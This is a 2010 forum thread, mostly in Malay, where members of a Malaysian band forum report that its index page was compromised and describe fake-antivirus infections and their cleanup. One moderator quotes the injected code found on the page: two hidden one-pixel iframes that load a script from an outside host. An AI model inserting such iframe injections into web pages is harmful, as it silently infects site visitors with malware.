| Author |
Message
|
| deadzid |
 Posted: Thu Dec 02, 2010 9:12 pm Post subject: Forum infected? |
 |
|
Mod Squad
Joined: 13 Feb 2004
Posts: 3891
Location: Shah Alam
|
apsal aku bukak forum i-bands, anti-virus aku detect ada trojan?
btw, i'm using avast! 5 (i think)...
ke aku sorang je yg kena?
since yesterday rasanya...
_________________
> facebook
> youtube
> my-mic
> mockspecial.com |
|
| Back to top |
|
 |
| deadzid |
| Posted: Thu Dec 02, 2010 9:14 pm Post subject: |
|
|
Mod Squad
Joined: 13 Feb 2004
Posts: 3891
Location: Shah Alam
|
pastu kat index page kuar menatang nih:
| Quote: | Warning: Cannot modify header information - headers already sent by (output started at /home/ibands/public_html/forum/index.php:2) in /home/ibands/public_html/forum/includes/page_header.php on line 485
Warning: Cannot modify header information - headers already sent by (output started at /home/ibands/public_html/forum/index.php:2) in /home/ibands/public_html/forum/includes/page_header.php on line 487
Warning: Cannot modify header information - headers already sent by (output started at /home/ibands/public_html/forum/index.php:2) in /home/ibands/public_html/forum/includes/page_header.php on line 488 |
_________________
> facebook
> youtube
> my-mic
> mockspecial.com |
|
| Back to top |
|
|
| ETERNAL |
| Posted: Thu Dec 02, 2010 9:43 pm Post subject: |
|
|
Mod Squad
Joined: 01 Aug 2005
Posts: 3382
Location: Dreamland
|
tapi dekat front page forum je...
yang lain sume ok...
avira aku detect infected cache... dan ade some weird file loading
| Quote: |
The file 'C:\Documents and Settings\Admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\d9d1h1md.default\Cache\1716BC21d01'
contained a virus or unwanted program 'HTML/Infected.WebPage.Gen' [virus]
Action(s) taken:
The file was moved to the quarantine directory under the name '4f64dca2.qua'. |
aku tak masuk www.i-bands.net/forum/index.php dah...
terus create shortcut direct ke sub forum..
lepas aku check page tu.. ade satu coding frame yang suspicious dekat starting page coding...
| Quote: | <iframe width="1" height="1" src="http://guwtron.com/gizmod/start.php?id=vlnd"></iframe><iframe width="1" height="1" src="http://guwtron.com/gizmod/start.php?id=vlnd"></iframe>
|
aku suspect ni macam iframe injection
ko tak getau ajeep ker? haha getau cepat.. suruh check
_________________
KreativWerks MediaSolutions|Soundcloud | YouTube | Facebook |
|
| Back to top |
|
|
| Jiro |
| Posted: Thu Dec 02, 2010 10:53 pm Post subject: |
|
|
Joined: 14 Feb 2007
Posts: 1933
Location: Shah Alam
|
| Quote: | watch out guys, i one of the victims...
last night when i out for meeting, i left my pc on and b4 i get out from house i already relize there is problem with ibands on the index page but i ignore it as im quite already late for meeting...
then later at night, come home i got alert waiting from microsoft essential what ever fcuk name it is tell my pc was infect by random speculation which i tot it was true, so i click remove using my avira, not the alert but it seems the alert once block my avira, block my task manager, block my rkill and it proceed with installation.
later i get to kill the process using security task manager, so i do scan with malwarebytes, it detect all the virus by the process name of Hotfix.exe and the porgram name Think Point (i google it, it is a very annoying malware) but seems like b4 i click remove, it already block my malwarebytes suddenly it appear again and block every my .exe program, which force me to restart.
now the disaster is, my pc cannot boot even in the safe mode or using last good configuration, i got BOD of STOP: c000021a [fatal error] (which an issue with winlogon and csrss process on boot)
i tried to enter recovery console and using all restoring point from 1 till 111, all unsuccessful. i end up 12 hours trying to fix it via recovery but none work even fixboot or fixmbr, i ghost logon but it will kill my ghost. At the end, the best to do is, repair windows using new setup which now i need to setup everything, my daw setting, driver, dll and alot of thing need to be done. AND TOMORROW IS MY DEADLINE TO SUBMIT MY WORK.ERGH~!
**sorry if i got carried away, im kinda piss of with that malware. |
jaga jaga...
mmg infected... aku dah kene.. 24 hours.. aku tak alert, dia maybe akan kuar Microsoft Essential detect virus dan ask you to remove, but actually dia akan install Think Point, iaitu fake anti virus yg menyerupai microsoft hotfix.exe
dia adalah malware, alert guys, better google how to protect, if not, jd cam aku..pc jahanam~!!!
might akan buat korang tak boleh connect ke internet, maybe tak bole boot window langsung even safe mode, paling teruk korang akan dapat BOD dgn fatal error "stop: Oxc000021a" issue dgn winlogon dan csrss conlicted utk load on start windows.
solution bergantung pada pc dan jenis system. aku try restore point dari 1 sampai 111 semua tak boleh jalan, at the end, reinstall windows.
***malware nih aku google adalah dari brazil, from some bank yg nak steal customer banking detail. watch out~!
_________________
Support Malaysia Local Band
Romance Not In Fashion
http://www.facebook.com/romancenotinfashion
http://www.myspace.com/rxfband
http://www.reverbnation.com/romancenotinfashion
"A mix is never finished, it’s abandoned."
My Page:
http://www.facebook.com/cjrxf
https://twitter.com/cjrxf
http://greg-livingatthemovies.blogspot.com/
Last edited by Jiro on Fri Dec 03, 2010 8:37 pm; edited 1 time in total |
|
| Back to top |
|
|
| ETERNAL |
| Posted: Thu Dec 02, 2010 11:09 pm Post subject: |
|
|
Mod Squad
Joined: 01 Aug 2005
Posts: 3382
Location: Dreamland
|
| Jiro wrote: | jaga jaga...
mmg infected... aku dah kene.. 24 hours.. aku tak alert, dia maybe akan kuar Microsoft Essential detect virus dan ask you to remove, but actually dia akan install Think Point, iaitu fake anti virus yg menyerupai microsoft hotfix.exe
dia adalah malware, alert guys, better google how to protect, if not, jd cam aku..pc jahanam~!!!
might akan buat korang tak boleh connect ke internet, maybe tak bole boot window langsung even safe mode, paling teruk korang akan dapat BOD dgn fatal error "stop: Oxc000021a" issue dgn winlogon dan csrss conlicted utk load on start windows.
solution bergantung pada pc dan jenis system. aku try restore point dari 1 sampai 111 semua tak boleh jalan, at the end, reinstall windows.
***malware nih aku google adalah dari brazil, from some bank yg nak steal customer banking detail. watch out~! |
haha... sape suruh ko install... haha...
dah la tamau pakai antivirus yang proper..
windows pun tamau update...
mane nak protected PC tu...
_________________
KreativWerks MediaSolutions|Soundcloud | YouTube | Facebook |
|
| Back to top |
|
|
| oRden |
| Posted: Fri Dec 03, 2010 9:07 am Post subject: |
|
|
Joined: 19 Feb 2008
Posts: 612
|
Aku cuma dapat yang "this site may harm your computer" tu je..ngan yang "cannot modify header" apa lancut yang deadzid cakap tu. yang lain2 takde lah pulak.
site lain pun ada gak kluar macam ni. kalau guna chrome la.
aku ingat ada kena-mengena dengan upgred or pindah2 databes ke..mana la tau...
| Quote: | | windows pun tamau update... |
camne nak update, ramai yang pakai lanun punye..kah3
_________________
For those little foofah in the roundabout
"orang yang head banging masa tengah dengar lagu metal akan dikatakan sebagai orang gila oleh orang yang tak dapat dengar muzik tu sedang berkumandang" - Nietzsche |
|
| Back to top |
|
|
| ETERNAL |
| Posted: Fri Dec 03, 2010 9:15 am Post subject: |
|
|
Mod Squad
Joined: 01 Aug 2005
Posts: 3382
Location: Dreamland
|
| oRden wrote: | Aku cuma dapat yang "this site may harm your computer" tu je..ngan yang "cannot modify header" apa lancut yang deadzid cakap tu. yang lain2 takde lah pulak.
site lain pun ada gak kluar macam ni. kalau guna chrome la.
aku ingat ada kena-mengena dengan upgred or pindah2 databes ke..mana la tau...
| Quote: | | windows pun tamau update... |
camne nak update, ramai yang pakai lanun punye..kah3 |
sebab google dah letak warning....
sebab tu la korang banyak problem ngan PC & software...
pelik aku... dah bertahun2 aku mengadap PC ini kali kedua aku tgk orang kluar statement ni.. orang pertama adalah jiro... haha
_________________
KreativWerks MediaSolutions|Soundcloud | YouTube | Facebook |
|
| Back to top |
|
|
| deadzid |
| Posted: Fri Dec 03, 2010 10:41 am Post subject: |
|
|
Mod Squad
Joined: 13 Feb 2004
Posts: 3891
Location: Shah Alam
|
|
| Back to top |
|
|
| boyroy |
| Posted: Fri Dec 03, 2010 8:06 pm Post subject: |
|
|
Joined: 28 Jun 2008
Posts: 1429
Location: Shah Alam
|
| deadzid wrote: | hari ni sudah kembali normal, kan?
wah sungguh pantas respon dari i-bands terhadap aduan saya...
saya misti pilley! |
sy pown mst pilley....
tp babeyng ar,
cpu aku da jem sbj, gara2 x allert,
sbb public using ngan bebudak kt umh nih, chettt....
_________________
KRAMER MIJ 87~89
OrangeMusicStudioShahAlam since2004 call 0123-12345-0 for booking, MarshallTubeMA100&4x12",VS100&4x12", MG100DFX,LaneyTFX3hybrid UK, PeaveyCombo300,Hiwatt300,Hartke2500-2x10",hybridheadHartkeHA3500-Ashdown4x10"cab, SabianB8,StaggDH,PearlExportSeries&YamahaStageCustome,c/w twinpaddle, TamaImperial, IbanezGRX,SDGR, WashburnX10, YamahaRBX,EG303, VantageCustom, BossMT2,BF2,CH1,DD3,DS1, BehringerMultieffect, MegaHalfStack, - http://www.facebook.com/OrangeMusic Linda |
|
| Back to top |
|
|
| salammmm |
| Posted: Sun Dec 05, 2010 5:54 pm Post subject: |
|
|
Joined: 17 Dec 2009
Posts: 1573
Location: perak
|
| deadzid wrote: | pastu kat index page kuar menatang nih:
| Quote: | Warning: Cannot modify header information - headers already sent by (output started at /home/ibands/public_html/forum/index.php:2) in /home/ibands/public_html/forum/includes/page_header.php on line 485
Warning: Cannot modify header information - headers already sent by (output started at /home/ibands/public_html/forum/index.php:2) in /home/ibands/public_html/forum/includes/page_header.php on line 487
Warning: Cannot modify header information - headers already sent by (output started at /home/ibands/public_html/forum/index.php:2) in /home/ibands/public_html/forum/includes/page_header.php on line 488 | |
aku pun jd mcm ni.....aku biar je lama2...masa tu aku bukak 2 tab,satu tab bkak ibands,satu lg fbook....aku igt aku pnya netbook infected dari fbook...sbb time tu loading page fbook lmbt sgt....then tiba2 kuar dialog kt bwh tu,"windows report bla bla bla .....pstu suh scan....ni mmg fake antivirus mcm jiro ckp....aku x pnh instal tetiba je ada antivirus ni.....
memula aku igt sbb fbook ni yg infected...psl bila aku refresh balik page fbook tros kna block,dia kata ''this site may harm your computer''(dah kena baru nk block,buduh sgguh)....
bila netbook dh jhanam....aku p bkk ibands ikut pc plak....reported attack site....huhu...i-bands rupanya yg infected....
skrg netbook aku dh elok....sekian shj cerita saya.... 
_________________
............. |
|
| Back to top |
|
|
| National9V |
| Posted: Thu Dec 09, 2010 12:27 pm Post subject: |
|
|
Joined: 26 May 2009
Posts: 311
|
| dah sehat rupanya forum nih.... |
|
| Back to top |
|
|
| ETERNAL |
| Posted: Thu Dec 09, 2010 12:33 pm Post subject: |
|
|
Mod Squad
Joined: 01 Aug 2005
Posts: 3382
Location: Dreamland
|
| National9V wrote: | | dah sehat rupanya forum nih.... |
lambat cucuk la anda
_________________
KreativWerks MediaSolutions|Soundcloud | YouTube | Facebook |
|
| Back to top |
|
|
| National9V |
| Posted: Thu Dec 09, 2010 12:43 pm Post subject: |
|
|
Joined: 26 May 2009
Posts: 311
|
| ETERNAL wrote: | | National9V wrote: | | dah sehat rupanya forum nih.... |
lambat cucuk la anda |
adalah kerana cuti yg panjang serta ketiadaan bekalan internet di rumah.... |
|
| Back to top |
|
|
|
|
